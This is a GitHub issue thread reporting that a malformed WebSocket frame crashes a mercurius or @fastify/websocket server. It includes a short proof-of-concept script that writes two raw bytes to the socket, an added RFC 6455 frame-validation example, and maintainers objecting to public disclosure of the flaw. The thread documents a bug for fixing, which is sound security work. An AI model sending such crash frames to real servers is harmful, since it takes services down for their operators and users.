Closed marcolanaro closed 1 year ago
Last time it was an issue in @fastify/websocket, this time I'm not so sure.

For comparison, if I remove mercurius from the equation, I was able to crash a standard fastify websocket server, now I'm not able anymore. Following is an example that was crashing before @fastify/websocket@7.1.1.
`crash_it.js`:

```js
const WebSocket = require('ws');

// Open a connection requesting the 'graphql-ws' subprotocol (second parameter).
const ws = new WebSocket('ws://127.0.0.1:2000', 'graphql-ws');

ws.on('open', function open() {
  // Write two raw bytes straight to the TCP socket, bypassing ws's own framing.
  ws._socket.write(Buffer.from([0xa2, 0x00]));
});
```
`index.js`:

```js
const Fastify = require('fastify')
const fastifyWebsocket = require('@fastify/websocket')

async function start() {
  const fastify = Fastify()
  await fastify.register(fastifyWebsocket)
  await fastify.listen({ port: 2000 })
}

start();
```
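To see what the two bytes in `crash_it.js` actually are on the wire, here is an added example (not code from the issue or from the fastify/mercurius projects) that decodes a WebSocket frame header per RFC 6455 and lists the reasons a server must reject it with a protocol-error close instead of letting the frame reach application code. The `extensionsNegotiated` option is an assumption of this snippet, standing in for whatever the server negotiated during the handshake.

```javascript
// Opcode groups from RFC 6455 section 5.2.
const DATA_OPCODES = new Set([0x0, 0x1, 0x2]);      // continuation, text, binary
const CONTROL_OPCODES = new Set([0x8, 0x9, 0xa]);   // close, ping, pong

// Decode the first two header bytes of a client-to-server frame and validate
// them. Returns { ok, header, errors }; a non-empty errors list means the
// server should close the connection with status 1002 (protocol error).
function parseFrameHeader(bytes, { extensionsNegotiated = false } = {}) {
  if (bytes.length < 2) {
    return { ok: false, header: null, errors: ['frame header truncated'] };
  }
  const b0 = bytes[0];
  const b1 = bytes[1];
  const header = {
    fin: (b0 & 0x80) !== 0,
    rsv1: (b0 & 0x40) !== 0,
    rsv2: (b0 & 0x20) !== 0,
    rsv3: (b0 & 0x10) !== 0,
    opcode: b0 & 0x0f,
    masked: (b1 & 0x80) !== 0,
    payloadLength: b1 & 0x7f,   // 126/127 mean an extended length follows
  };
  const errors = [];
  // RSV1-3 are reserved for extensions; without one negotiated they must be 0.
  if (!extensionsNegotiated && (header.rsv1 || header.rsv2 || header.rsv3)) {
    errors.push('RSV bits set without a negotiated extension');
  }
  if (!DATA_OPCODES.has(header.opcode) && !CONTROL_OPCODES.has(header.opcode)) {
    errors.push(`reserved opcode 0x${header.opcode.toString(16)}`);
  }
  if (CONTROL_OPCODES.has(header.opcode)) {
    if (!header.fin) errors.push('fragmented control frame');
    if (header.payloadLength > 125) errors.push('control frame payload > 125 bytes');
  }
  // Every frame from a client must be masked (RFC 6455 section 5.1).
  if (!header.masked) errors.push('client-to-server frame is not masked');
  return { ok: errors.length === 0, header, errors };
}

// Constructed inputs: the frame from crash_it.js and a well-formed one.
const INVALID_FRAME = [0xa2, 0x00]; // FIN=1, RSV2=1, opcode=2, unmasked, len 0
const VALID_FRAME = [0x82, 0x85];   // FIN=1, opcode=2, masked, len 5
```

For `INVALID_FRAME` the decoder reports both the RSV2 bit and the missing mask, which is why a compliant server drops the connection at the framing layer.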
This is the second time you disclose a security vulnerability publicly. Please stop and report them privately instead.
I apologise, this is the first time I've been told not to. It will not happen again.
Most projects will have a SECURITY.md file. You should have followed the instructions there:
https://github.com/mercurius-js/mercurius/blob/master/SECURITY.md
It looks like the server crashes in specific conditions. This is related to #908. I thought I solved it with https://github.com/fastify/fastify-websocket/pull/228, but that's not completely true.
Before that PR, I was able to crash mercurius with:

Now that's happening only when specifying the websocket protocol. Given this server `index.js`:

I can crash it by executing this script `crash_it.js` (see the second parameter of the WebSocket class):